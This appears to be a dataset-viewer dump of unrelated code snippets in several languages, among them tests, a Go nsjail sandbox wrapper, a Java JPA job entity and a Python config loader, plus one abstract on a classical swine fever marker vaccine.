def analyze(self):
"""Analyze the file."""
self.instance.analyze(**self.analysis_settings) |
/**
Gets the root module without checking that the layout of `M` is the expected one.
This is effectively a transmute.
This is useful if a user keeps a cache of which dynamic libraries
have been checked for layout compatibility.
# Safety
The caller must ensure that `M` has the expected layout.
# Errors
This function can return a `RootModuleError`
because the root module failed to initialize.
*/
pub unsafe fn unchecked_layout<M>(&self)->Result<M, RootModuleError>
where
M: PrefixRefTrait,
{
self.module.try_init(|| (self.constructor.0)().into_result() )
.map_err(|mut err|{
// Making sure that the error doesn't contain references into
// the unloaded library.
err.reallocate();
err
})?
.cast::<M::PrefixFields>()
.piped(M::from_prefix_ref)
.piped(Ok)
} |
def ensure_a_list(data: Any) -> Union[List[int], List[str]]:
if not data:
return []
if isinstance(data, (list, tuple, set)):
return list(data)
if isinstance(data, str):
data = trimmed_split(data)
return data
return [data] |
<filename>test/interactive/command_test.go
/*
Copyright 2020 The Knative Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package interactive
import (
"os/exec"
"testing"
"github.com/davecgh/go-spew/spew"
)
var (
mySpew *spew.ConfigState
arbitraryArgs []string
)
func init() {
mySpew = spew.NewDefaultConfig()
mySpew.DisableMethods = true
arbitraryArgs = []string{"docker", "run", "something"}
}
func argsValidator(t *testing.T, args []string) func(c *exec.Cmd) error {
return func(c *exec.Cmd) error {
for i, arg := range arbitraryArgs {
if c.Args[i] != arg {
t.Errorf("c.Args[%d] not correct", i)
}
}
t.Log("Validated c.Args")
if t.Failed() {
mySpew.Sdump(*c)
}
return nil
}
}
func TestNewCommand(t *testing.T) {
cmd := NewCommand(arbitraryArgs...)
cmd.run = argsValidator(t, arbitraryArgs)
cmd.Run()
}
func TestAddArgs(t *testing.T) {
cmd := NewCommand(arbitraryArgs[0])
cmd.AddArgs(arbitraryArgs[1:]...)
cmd.run = argsValidator(t, arbitraryArgs)
cmd.Run()
}
func TestCommandStringer(t *testing.T) {
t.Log(NewCommand("true"))
}
|
async def register_users(user: User):
redis_client = get_redis_client()
code = os.urandom(3).hex()
user.code = code
district = str(user.district)
user.session_ids = []
obj = dict(user)
path = f'["{user.email}"]'
redis_client.jsonset('users', Path(path), obj)
send_verification_mail.delay(user.email, code)
if redis_client.jsontype("districts", Path(f'["{district}"]')) is None:
redis_client.jsonset("districts", Path(f'["{district}"]'), [])
redis_client.jsonarrappend("districts", Path(f'["{district}"]'), user.email)
return JSONResponse({"success": True}, status_code=201) |
// This function is called from PRACH worker (can wait)
void rrc::add_user(uint16_t rnti)
{
pthread_mutex_lock(&user_mutex);
if (users.count(rnti) == 0) {
users[rnti].parent = this;
users[rnti].rnti = rnti;
rlc->add_user(rnti);
pdcp->add_user(rnti);
rrc_log->info("Added new user rnti=0x%x\n", rnti);
} else {
rrc_log->error("Adding user rnti=0x%x (already exists)\n", rnti);
}
if(rnti == SRSLTE_MRNTI){
srslte::srslte_pdcp_config_t cfg;
cfg.is_control = false;
cfg.is_data = true;
cfg.direction = SECURITY_DIRECTION_DOWNLINK;
uint32_t teid_in = 1;
for(uint32_t i = 0; i <mcch.pmch_infolist_r9[0].mbms_sessioninfolist_r9_size; i++) {
uint32_t lcid = mcch.pmch_infolist_r9[0].mbms_sessioninfolist_r9[i].logicalchannelid_r9;
rlc->add_bearer_mrb(SRSLTE_MRNTI,lcid);
pdcp->add_bearer(SRSLTE_MRNTI,lcid,cfg);
gtpu->add_bearer(SRSLTE_MRNTI,lcid, 1, 1, &teid_in);
}
}
pthread_mutex_unlock(&user_mutex);
} |
// Invoke fulfils the Batcher interface
func (b *BRecv) Invoke(ctx context.Context, exp *Expect, timeout time.Duration, batchIdx int) error {
defer exp.Conn.SetReadDeadline(time.Time{})
exp.Conn.SetReadDeadline(time.Now().Add(timeout))
var offs []int
for {
select {
case <-ctx.Done():
return ctx.Err()
default:
}
offs = b.Re.FindSubmatchIndex(exp.buf)
if offs != nil {
break
}
var buf [512]byte
sz, err := exp.Conn.Read(buf[:])
if err != nil {
return err
}
if exp.Logger != nil {
exp.Logger(Log{Type: MsgRecv, Data: string(buf[:sz])})
}
exp.buf = append(exp.buf, buf[:sz]...)
}
if cbExisted, err := b.onSuccess(exp, offs); cbExisted {
return err
}
exp.buf = exp.buf[offs[1]:]
return nil
} |
Classical swine fever virus replicon particles lacking the Erns gene: a potential marker vaccine for intradermal application.
Classical swine fever virus replicon particles (CSF-VRP) deficient for E(rns) were evaluated as a non-transmissible marker vaccine. A cDNA clone of CSFV strain Alfort/187 was used to obtain a replication-competent mutant genome (replicon) lacking the sequence encoding the 227 amino acids of the glycoprotein E(rns) (A187delE(rns)). For packaging of A187delE(rns) into virus particles, porcine kidney cell lines constitutively expressing E(rns) of CSFV were established. The rescued VRP were infectious in cell culture but did not yield infectious progeny virus. Single intradermal vaccination of two pigs with 10(7) TCID(50) of VRP A187delE(rns) elicited neutralizing antibodies, anti-E2 antibodies, and cellular immune responses determined by an increase of IFN-gamma producing cells. No anti-E(rns) antibodies were detected in the vaccinees confirming that this vaccine represents a negative marker vaccine allowing differentiation between infected and vaccinated animals. The two pigs were protected against lethal challenge with the highly virulent CSFV strain Eystrup. In contrast, oral immunization resulted in only partial protection, and neither CSFV-specific antibodies nor stimulated T-cells were found before challenge. These data represent a good basis for more extended vaccination/challenge trials including larger numbers of animals as well as more thorough analysis of virus shedding using sentinel animals to monitor horizontal spread of the challenge virus. |
package meet_eat.data.entity;
import meet_eat.data.entity.user.User;
import meet_eat.data.factory.TokenFactory;
import meet_eat.data.factory.UserFactory;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotEquals;
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertNull;
public class TokenCommonTest {
@Test
public void testConstructorWithUserAndValue() {
// Test data
UserFactory userFactory = new UserFactory();
User user = userFactory.getValidObject();
String value = "ThisIsAValue";
// Execution
Token token = new Token(user, value);
// Assertions
assertNotNull(token);
}
@Test
public void testConstructor() {
// Execution
Token token = new TokenFactory().getValidObject();
// Assertion
assertNotNull(token);
}
@Test
public void testConstructorNullIdentifier() {
// Test data
UserFactory userFactory = new UserFactory();
User user = userFactory.getValidObject();
String value = "ACrazyValue";
// Execution
Token token = new Token(null, user, value);
// Assertion
assertNotNull(token);
assertNull(token.getIdentifier());
}
@Test(expected = NullPointerException.class)
public void testConstructorNullUser() {
// Test data
String identifier = "AnIdentifier";
String value = "ValueIsNotNull";
// Execution
new Token(identifier, null, value);
}
@Test(expected = NullPointerException.class)
public void testConstructorNullValue() {
// Test data
String identifier = "AnotherIdentifier";
UserFactory userFactory = new UserFactory();
User user = userFactory.getValidObject();
// Execution
new Token(identifier, user, null);
}
@Test
public void testTokenNotEqual() {
// Execution
TokenFactory tokenFactory = new TokenFactory();
Token token1 = tokenFactory.getValidObject();
Token token2 = tokenFactory.getValidObject();
// Assertion
assertNotEquals(token1, token2);
}
@Test
public void testEquals() {
// Execution
Token token = new TokenFactory().getValidObject();
Token tokenCopy = new Token(token.getIdentifier(), token.getUser(), token.getValue());
// Assertions
assertEquals(token, token);
assertNotEquals(null, token);
assertNotEquals(token, new Object());
assertEquals(token, tokenCopy);
assertEquals(token.hashCode(), tokenCopy.hashCode());
}
}
|
package techreborn.blockentity.machine.tier0.block.blockplacer;
import net.minecraft.nbt.NbtCompound;
import reborncore.client.screen.builder.BlockEntityScreenHandlerBuilder;
import techreborn.blockentity.machine.tier0.block.ProcessingStatus;
/**
* <b>Class handling Nbt values of the Block Placer</b>
* <br>
* Inherited by the {@link BlockPlacerProcessor} for keeping its values in sync when saving/loading a map
*
* @author SimonFlapse
* @see BlockPlacerProcessor
*/
class BlockPlacerNbt {
protected int placeTime;
protected int currentPlaceTime;
protected ProcessingStatus status = BlockPlacerStatus.IDLE;
public void writeNbt(NbtCompound tag) {
tag.putInt("placeTime", this.placeTime);
tag.putInt("currentPlaceTime", this.currentPlaceTime);
tag.putInt("blockPlacerStatus", getStatus());
}
public void readNbt(NbtCompound tag) {
this.placeTime = tag.getInt("placeTime");
this.currentPlaceTime = tag.getInt("currentPlaceTime");
setStatus(tag.getInt("blockPlacerStatus"));
}
public BlockEntityScreenHandlerBuilder syncNbt(BlockEntityScreenHandlerBuilder builder) {
return builder.sync(this::getPlaceTime, this::setPlaceTime)
.sync(this::getCurrentPlaceTime, this::setCurrentPlaceTime)
.sync(this::getStatus, this::setStatus);
}
protected int getPlaceTime() {
return placeTime;
}
protected void setPlaceTime(int placeTime) {
this.placeTime = placeTime;
}
protected int getCurrentPlaceTime() {
return currentPlaceTime;
}
protected void setCurrentPlaceTime(int currentPlaceTime) {
this.currentPlaceTime = currentPlaceTime;
}
protected int getStatus() {
return status.getStatusCode();
}
protected void setStatus(int status) {
this.status = BlockPlacerStatus.values()[status];
}
}
|
/*
* NXFindBestFatArch() is passed a cputype and cpusubtype and a set of
* fat_arch structs and selects the best one that matches (if any) and returns
* a pointer to that fat_arch struct (or NULL). The fat_arch structs must be
* in the host byte order and correct such that the fat_archs really points to
* enough memory for nfat_arch structs. It is possible that this routine could
* fail if new cputypes or cpusubtypes are added and an old version of this
* routine is used. But if there is an exact match between the cputype and
* cpusubtype and one of the fat_arch structs this routine will always succeed.
*/
struct fat_arch *
NXFindBestFatArch(
cpu_type_t cputype,
cpu_subtype_t cpusubtype,
struct fat_arch *fat_archs,
uint32_t nfat_archs)
{
int32_t i;
i = internal_NXFindBestFatArch(cputype, cpusubtype, fat_archs, NULL,
nfat_archs);
if(i == -1)
return(NULL);
return(fat_archs + i);
} |
<gh_stars>1-10
package freezer
import (
"context"
"errors"
"fmt"
"io"
"io/ioutil"
"os"
"os/exec"
"path/filepath"
"time"
nsjailpb "github.com/dzeromsk/subslicer/freezer/pb"
"github.com/golang/protobuf/proto"
"github.com/justincormack/go-memfd"
)
var (
FreezerDir = "/sys/fs/cgroup/freezer"
MemoryDir = "/sys/fs/cgroup/memory"
)
type Freezer struct {
*exec.Cmd
Name string
Chroot string
Configure func(*Freezer) *nsjailpb.NsJailConfig
nsjail *memfd.Memfd
wrapper *memfd.Memfd
config *memfd.Memfd
state *os.File
freezerDir string
}
func NewFreezer(name string, arg ...string) (*Freezer, error) {
return NewSandboxContext(context.Background(), name, arg...)
}
func NewSandboxContext(ctx context.Context, name string, arg ...string) (f *Freezer, err error) {
if ctx == nil {
return nil, errors.New("nil context")
}
// if filepath.Base(name) == name {
// if _, err := exec.LookPath(name); err != nil {
// return nil, err
// }
// }
// ctx is hidden in Cmd struct
f = &Freezer{
Cmd: exec.CommandContext(ctx, "/dev/null", arg...),
}
f.Name = name
f.freezerDir, err = ioutil.TempDir(FreezerDir, "gofreezer")
if err != nil {
return nil, err
}
tasks := filepath.Join(f.freezerDir, "tasks")
state := filepath.Join(f.freezerDir, "freezer.state")
f.state, err = os.OpenFile(state, os.O_WRONLY, 0666)
if err != nil {
return nil, err
}
f.config, err = memfd.CreateNameFlags("freezer:config", memfd.Cloexec)
if err != nil {
return nil, err
}
f.nsjail, err = createNsjail()
if err != nil {
return nil, err
}
f.wrapper, err = createWrapper(tasks, procPath(f.nsjail.File))
if err != nil {
return nil, err
}
f.Configure = configure
// runtime.SetFinalizer(f, (*Freezer).Close)
return f, nil
}
func (f *Freezer) Close() error {
// TODO(dzeromsk): multierr or something
var err error
if err2 := f.Thaw(); err2 != nil {
err = err2
}
files := []io.Closer{f.config, f.wrapper, f.state, f.nsjail}
for _, f := range files {
if err2 := f.Close(); err2 != nil {
err = err2
}
}
if err2 := os.Remove(f.freezerDir); err2 != nil {
// TOOD(dzeromsk): proper retry + backoff, or poll
time.Sleep(500 * time.Millisecond)
if err3 := os.Remove(f.freezerDir); err3 != nil {
err = err3
} else {
// err = err2
}
}
// runtime.SetFinalizer(f, nil)
return err
}
func (f *Freezer) Run() error {
if err := f.Start(); err != nil {
return err
}
return f.Wait()
}
func (f *Freezer) Start() error {
if f.Process != nil {
return errors.New("freezer: already started")
}
// serialize nsjail config to file
if err := proto.MarshalText(f.config, f.Configure(f)); err != nil {
return err
}
// run command in nsjail
f.Args = append([]string{
"nsjail", "--quiet", "--config", procPath(f.config.File), "--", f.Name,
}, f.Args[1:]...)
// we call nsjail via wrapper with cgroup freezer
f.Path = procPath(f.wrapper.File)
f.Dir = ""
f.Env = nil
return f.Cmd.Start()
}
func (f *Freezer) Freeze() error {
_, err := f.state.WriteString("FROZEN")
return err
}
func (f *Freezer) Thaw() error {
_, err := f.state.WriteString("THAWED")
return err
}
func configure(f *Freezer) *nsjailpb.NsJailConfig {
if f.Chroot == "" {
f.Chroot = "/"
}
if f.Dir == "" {
f.Dir = "/"
}
var passFd []int32
for _, f := range f.ExtraFiles {
passFd = append(passFd, int32(f.Fd()))
}
config := &nsjailpb.NsJailConfig{
Mount: []*nsjailpb.MountPt{
{
Src: proto.String(f.Chroot),
Dst: proto.String("/"),
IsBind: proto.Bool(true),
Rw: proto.Bool(false),
IsDir: proto.Bool(true),
},
{
Src: proto.String("/dev/urandom"),
Dst: proto.String("/dev/urandom"),
IsBind: proto.Bool(true),
},
},
Uidmap: []*nsjailpb.IdMap{{
InsideId: proto.String("root"),
OutsideId: proto.String("nobody"),
}},
Gidmap: []*nsjailpb.IdMap{{
InsideId: proto.String("root"),
OutsideId: proto.String("nogroup"),
}},
Cwd: proto.String(f.Dir),
MountProc: proto.Bool(true),
Envar: f.Env,
PassFd: passFd,
Hostname: proto.String("freezer"),
LogLevel: nsjailpb.LogLevel_WARNING.Enum(),
RlimitAsType: nsjailpb.RLimit_INF.Enum(),
RlimitFsizeType: nsjailpb.RLimit_INF.Enum(),
CloneNewnet: proto.Bool(false),
}
return config
}
func procPath(f *os.File) string {
return fmt.Sprintf("/proc/%d/fd/%d", os.Getpid(), f.Fd())
}
const wrapperTemp = `#!/bin/bash
set -e
echo $$ > %s
exec -c -a nsjail %s "$@"
`
func createWrapper(tasks, nsjail string) (*memfd.Memfd, error) {
f, err := memfd.CreateNameFlags("freezer:wrapper", memfd.Cloexec)
if err != nil {
return nil, err
}
_, err = f.WriteString(fmt.Sprintf(wrapperTemp, tasks, nsjail))
if err != nil {
return nil, err
}
return f, nil
}
func createNsjail() (*memfd.Memfd, error) {
f, err := memfd.CreateNameFlags("freezer:nsjail", memfd.Cloexec)
if err != nil {
return nil, err
}
data, err := Asset("nsjail")
if err != nil {
return nil, err
}
if _, err := f.Write(data); err != nil {
return nil, err
}
return f, nil
}
|
/**
* Executes the action asynchronously with a callback.
*
* @param callback The action completion callback.
* @param looper A Looper object whose message queue will be used for the callback,
* or null to make callbacks on the calling thread or main thread if the current thread
* does not have a looper associated with it.
*/
public void run(@Nullable Looper looper, @Nullable final ActionCompletionCallback callback) {
if (looper == null) {
Looper myLooper = Looper.myLooper();
looper = myLooper != null ? myLooper : Looper.getMainLooper();
}
final ActionArguments arguments = createActionArguments();
final Handler handler = new Handler(looper);
ActionRunnable runnable = new ActionRunnable(arguments) {
@Override
void onFinish(@NonNull final ActionArguments arguments, @NonNull final ActionResult result) {
if (callback == null) {
return;
}
if (handler.getLooper() == Looper.myLooper()) {
callback.onFinish(arguments, result);
} else {
handler.post(new Runnable() {
@Override
public void run() {
callback.onFinish(arguments, result);
}
});
}
}
};
if (shouldRunOnMain(arguments)) {
if (Looper.myLooper() == Looper.getMainLooper()) {
runnable.run();
} else {
new Handler(Looper.getMainLooper()).post(runnable);
}
} else {
executor.execute(runnable);
}
} |
def computeQValueFromValues(self, state, action):
Q_value = 0
transition_information = self.mdp.getTransitionStatesAndProbs(state,action)
for next_state , probability in transition_information:
next_state_value = self.getValue(next_state)
next_state_reward = self.mdp.getReward(state,action,next_state)
Q_value = Q_value + probability * (next_state_reward + self.discount * next_state_value)
return Q_value |
def generate_traj(self, N, start=None, stop=None, stride=1):
self._check_is_estimated()
from pyemma.msm.generation import generate_traj as _generate_traj
syntraj = _generate_traj(self.transition_matrix, N, start=start, stop=stop, dt=stride)
from pyemma.util.discrete_trajectories import sample_indexes_by_sequence
return sample_indexes_by_sequence(self.active_state_indexes, syntraj) |
/* Should:
* 1) Have the right player turn
* 2) Reverse the right subBoard
* 3) Remove the right piece
* 4) Have the right pieces on board
* 5) Have the right player turn
*/
@Test
public void testUndoMove() {
final Board gameBoard = BoardFactory.createSixBySixBoard("[xo xo ox ox o xo xxo xo ox ox xo xo]");
final Move move = MoveFactory.createMove(6, 1, true, GameValueFactory.getDraw());
assertEquals("Player should be X", Piece.X, gameBoard.currPlayerPiece());
assertEquals("Pieces on board should be 24", 24, gameBoard.getPiecesOnBoard());
final Board gameBoardAfterUndoMove = gameBoard.undoMove(move);
assertEquals("Game board should be correct", "[ xxo x ox xooo xxo xo ox ox xo xo]", gameBoardAfterUndoMove.toString());
assertEquals("Pieces on board should now be 23", 23, gameBoardAfterUndoMove.getPiecesOnBoard());
assertEquals("Player should be O", Piece.O, gameBoardAfterUndoMove.currPlayerPiece());
} |
/* -*- Mode: C++; tab-width: 8; indent-tabs-mode: nil; c-basic-offset: 2 -*-
* vim: set ts=8 sts=2 et sw=2 tw=80:
* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#ifndef builtin_JSON_h
#define builtin_JSON_h
#include "mozilla/Range.h"
#include "NamespaceImports.h"
#include "js/RootingAPI.h"
namespace js {
class StringBuffer;
extern const JSClass JSONClass;
enum class StringifyBehavior { Normal, RestrictedSafe };
/**
* If maybeSafely is true, Stringify will attempt to assert the API requirements
* of JS::ToJSONMaybeSafely as it traverses the graph, and will not try to
* invoke .toJSON on things as it goes.
*/
extern bool Stringify(JSContext* cx, js::MutableHandleValue vp,
JSObject* replacer, const Value& space, StringBuffer& sb,
StringifyBehavior stringifyBehavior);
template <typename CharT>
extern bool ParseJSONWithReviver(JSContext* cx,
const mozilla::Range<const CharT> chars,
HandleValue reviver, MutableHandleValue vp);
} // namespace js
#endif /* builtin_JSON_h */
|
import os
import abc
from .dict_utils import recursive_update
class ConfigLoaderException(Exception):
pass
class ConfigFileNotFoundException(Exception):
pass
class ConfigFormatter(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def encode(self, data):
"""
Args:
data: any serializable python type
Returns:
The encoded string data
"""
pass
@abc.abstractmethod
def decode(self, data):
"""
Args:
data (str): the raw data from the file
Returns:
Dict, list or any serializable python type
"""
pass
class ConfigLoader(object):
"""
Args:
formatter (ConfigFormatter): config encode/decode interface instance
base_path (str): a custom path which may be contains the config
nested (bool): in case of true, load all the config files found in the sources and merges it
"""
def __init__(self, formatter, base_path, nested = False):
self.sources = [
os.getcwd(),
os.path.dirname(os.path.abspath(base_path)),
os.path.expanduser('~'),
'/etc',
]
self.__loaded_config_file = None
self.__formatter = formatter
self.__nested = nested
@property
def filename(self):
return self.__loaded_config_file
def __search_config_files(self, filename):
filenames = []
tries = []
for source in self.sources:
file_path = os.path.join(source, filename)
tries.append(file_path)
if not os.path.exists(file_path):
continue
filenames.append(file_path)
return filenames, tries
def __load_config_files(self, filenames):
data = dict()
for filename in filenames:
with open(filename) as f:
recursive_update(data, self.__formatter.decode(f.read()))
return data
def load(self, filename, create = None, default_conf = {}):
"""Load the config file
Args:
filename (str): the filename of the config, without any path
create (str): if the config file not found, and this parameter is not None,
a config file will be create with content of default_conf
default_conf (dict): content of the default config data
Returns:
Return value of the ConfigFormatter.decode or the default_conf value
Raises:
ConfigFileNotFoundException: if the config file not found
"""
filenames, tries = self.__search_config_files(filename)
if len(filenames):
self.__loaded_config_file = filenames if self.__nested else filenames[0]
return self.__load_config_files(filenames if self.__nested else filenames[:1])
if create is not None:
self.__loaded_config_file = os.path.join(create, filename)
self.save(default_conf)
return default_conf
raise ConfigFileNotFoundException("Config file not found in: %s" % tries)
def save(self, data):
"""Save the config data
Args:
data: any serializable config data
Raises:
ConfigLoaderException: if the ConfigLoader.load not called, so there is no config file name,
or the data is not serializable or the loader is nested
"""
if self.__nested:
raise ConfigLoaderException("Cannot save the config if the 'nested' paramter is True!")
if self.__loaded_config_file is None:
raise ConfigLoaderException("Load not called yet!")
try:
with open(self.__loaded_config_file, 'w') as f:
f.write(self.__formatter.encode(data))
except Exception as e:
raise ConfigLoaderException("Config data is not serializable: %s" % e)
|
/**
*
* @author Valdiney V GOMES
*/
@Entity
@Table(indexes = {
@Index(name = "IDX_name", columnList = "name", unique = false)})
public class Job extends Tracker<Job> implements Serializable {
private Long id;
private Server server;
private String name;
private String alias;
private String description;
private String timeRestriction;
private String node;
private int retry;
private int tolerance;
private int wait;
private User approver;
private JobStatus status;
private List<JobParent> parent = new ArrayList();
private List<Subject> subject = new ArrayList();
private List<JobCheckup> checkup = new ArrayList();
private List<JobApproval> approval = new ArrayList();
private List<WorkbenchEmail> email = new ArrayList();
private List<String> shellScript = new ArrayList();
private Set<String> channel = new HashSet();
private boolean enabled = true;
private boolean notify;
private boolean rebuild;
private boolean rebuildBlocked;
private boolean anyScope;
private boolean checkupNotified;
private String cron;
private String blockingJobs;
public Job() {
}
public Job(Long id) {
this.id = id;
}
public Job(String name, Server server) {
this.name = name;
this.server = server;
}
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
@OneToOne(cascade = {CascadeType.DETACH, CascadeType.MERGE, CascadeType.REFRESH, CascadeType.PERSIST})
@JoinColumn(name = "server_id", referencedColumnName = "id")
public Server getServer() {
return server;
}
public void setServer(Server server) {
this.server = server;
}
@Size(min = 1, max = 255)
@Column(unique = true)
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getAlias() {
return alias;
}
public void setAlias(String alias) {
this.alias = alias;
}
@Transient
public String getDisplayName() {
if (alias == null || alias.isEmpty()) {
return name.replaceAll(" ", "_");
}
return alias.replaceAll(" ", "_") + "[alias]";
}
@Column(columnDefinition = "text")
public String getDescription() {
return description;
}
public void setDescription(String description) {
this.description = description;
}
@Transient
public String getHTMLDescription() {
Parser parser = Parser.builder().build();
Node document = parser.parse(this.getDescription());
HtmlRenderer renderer = HtmlRenderer.builder().build();
return renderer.render(document);
}
@OneToOne(cascade = CascadeType.ALL, orphanRemoval = true)
@JoinColumn(name = "status_id", referencedColumnName = "id")
public JobStatus getStatus() {
if (status == null) {
status = new JobStatus();
}
return status;
}
public void setStatus(JobStatus status) {
this.status = status;
}
@ManyToMany(cascade = {CascadeType.DETACH, CascadeType.MERGE, CascadeType.REFRESH, CascadeType.PERSIST})
@JoinTable(name = "job_subject",
joinColumns = {
@JoinColumn(name = "job_id", referencedColumnName = "id")},
inverseJoinColumns = {
@JoinColumn(name = "subject_id", referencedColumnName = "id")})
public List<Subject> getSubject() {
return subject;
}
public void setSubject(List<Subject> subject) {
this.subject = subject;
}
public void addSubject(Subject subject) {
this.subject.add(subject);
}
@OneToMany(cascade = CascadeType.ALL, orphanRemoval = true)
@JoinColumn(name = "job_id", referencedColumnName = "id")
@BatchSize(size = 20)
@OrderBy(clause = "id, scope")
public List<JobParent> getParent() {
return parent;
}
public void setParent(List<JobParent> parent) {
this.parent = parent;
}
public void addParent(JobParent parent) {
this.parent.add(parent);
}
@OneToMany(cascade = CascadeType.ALL, orphanRemoval = true)
@JoinColumn(name = "job_id", referencedColumnName = "id")
@BatchSize(size = 20)
public List<JobCheckup> getCheckup() {
return checkup;
}
public void setCheckup(List<JobCheckup> checkup) {
this.checkup = checkup;
}
public void addCheckup(JobCheckup checkup) {
this.checkup.add(checkup);
}
@OneToMany(cascade = CascadeType.ALL, orphanRemoval = true)
@JoinColumn(name = "job_id", referencedColumnName = "id")
@BatchSize(size = 20)
public List<JobApproval> getApproval() {
return approval;
}
public void setApproval(List<JobApproval> approval) {
this.approval = approval;
}
public void addApproval(JobApproval approval) {
this.approval.add(approval);
}
@ManyToMany(cascade = {CascadeType.DETACH, CascadeType.MERGE, CascadeType.REFRESH, CascadeType.PERSIST})
@JoinTable(name = "job_workbench_email",
joinColumns = {
@JoinColumn(name = "job_id", referencedColumnName = "id")},
inverseJoinColumns = {
@JoinColumn(name = "workbench_email_id", referencedColumnName = "id")})
public List<WorkbenchEmail> getEmail() {
return email;
}
public void setEmail(List<WorkbenchEmail> email) {
this.email = email;
}
public void addEmail(WorkbenchEmail email) {
this.email.add(email);
}
@Transient
public List<String> getShellScript() {
return shellScript;
}
public void setShellScript(List<String> shellScript) {
this.shellScript = shellScript;
}
public void addShellScript(String shellScript) {
this.shellScript.add(shellScript);
}
@Transient
public String getNode() {
return node;
}
public void setNode(String node) {
this.node = node;
}
public boolean isRebuild() {
return rebuild;
}
public void setRebuild(boolean rebuild) {
this.rebuild = rebuild;
}
public boolean isNotify() {
return notify;
}
public void setNotify(boolean notify) {
this.notify = notify;
}
public int getRetry() {
return retry;
}
public void setRetry(int retry) {
this.retry = retry;
}
public int getTolerance() {
return tolerance;
}
public void setTolerance(int tolerance) {
this.tolerance = tolerance;
}
public int getWait() {
return wait;
}
public void setWait(int wait) {
this.wait = wait;
}
@ManyToOne
@JoinColumn(name = "user_id", referencedColumnName = "user_id")
public User getApprover() {
return this.approver;
}
public void setApprover(User approver) {
this.approver = approver;
}
@ElementCollection(fetch = FetchType.EAGER)
@CollectionTable(name = "job_channel", joinColumns = @JoinColumn(name = "id"))
@Column(name = "channel")
public Set<String> getChannel() {
return channel;
}
public void setChannel(Set<String> channel) {
this.channel = channel;
}
public void addChannel(String channel) {
this.channel.add(channel);
}
public boolean isEnabled() {
return enabled;
}
public void setEnabled(boolean enabled) {
this.enabled = enabled;
}
public boolean isRebuildBlocked() {
return rebuildBlocked;
}
public void setRebuildBlocked(boolean rebuildBlocked) {
this.rebuildBlocked = rebuildBlocked;
}
public String getTimeRestriction() {
return timeRestriction;
}
public void setTimeRestriction(String timeRestriction) {
this.timeRestriction = timeRestriction;
}
@Transient
public String getTimeRestrictionDescription() {
String verbose = "";
if (this.getTimeRestriction() != null) {
if (!this.getTimeRestriction().isEmpty()) {
verbose = StringUtils.capitalize(
CronDescriptor
.instance(Locale.ENGLISH)
.describe(new CronParser(
CronDefinitionBuilder.instanceDefinitionFor(QUARTZ))
.parse(this.getTimeRestriction())
)
);
}
}
return verbose;
}
public boolean isAnyScope() {
return anyScope;
}
public void setAnyScope(boolean anyScope) {
this.anyScope = anyScope;
}
public boolean isCheckupNotified() {
return checkupNotified;
}
public void setCheckupNotified(boolean checkupNotified) {
this.checkupNotified = checkupNotified;
}
@Transient
public String getCron() {
return cron;
}
public void setCron(String cron) {
this.cron = cron;
}
@Transient
public String getCronDescription() {
return this.getCronDescription(false);
}
@Transient
public String getCronDescription(boolean secure) {
String cronDescription = "";
if (this.getCron() != null && !this.getCron().isEmpty()) {
CronParser parser = new CronParser(CronDefinitionBuilder.instanceDefinitionFor(UNIX));
CronDescriptor descriptor = CronDescriptor.instance(Locale.ENGLISH);
if (secure) {
try {
cronDescription = descriptor.describe(parser.parse(this.getCron()));
} catch (IllegalArgumentException e) {
cronDescription = e.getMessage();
}
} else {
cronDescription = descriptor.describe(parser.parse(this.getCron()));
}
}
return StringUtils.capitalize(cronDescription);
}
@Transient
public String getBlockingJobs() {
return blockingJobs;
}
public void setBlockingJobs(String blockingJobs) {
this.blockingJobs = blockingJobs;
}
@Override
public int hashCode() {
int hash = 3;
hash = 53 * hash + Objects.hashCode(this.id);
return hash;
}
@Override
public boolean equals(Object obj) {
final Job other = (Job) obj;
if (this == obj) {
return true;
}
if (obj == null) {
return false;
}
if (getClass() != obj.getClass()) {
return false;
}
return Objects.equals(this.id, other.id);
}
@Override
public String toString() {
JSONObject object = new JSONObject();
object.put("id", id);
object.put("name", name);
object.put("alias", alias);
object.put("description", description);
object.put("enabled", enabled);
return object.toString(2);
}
} |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.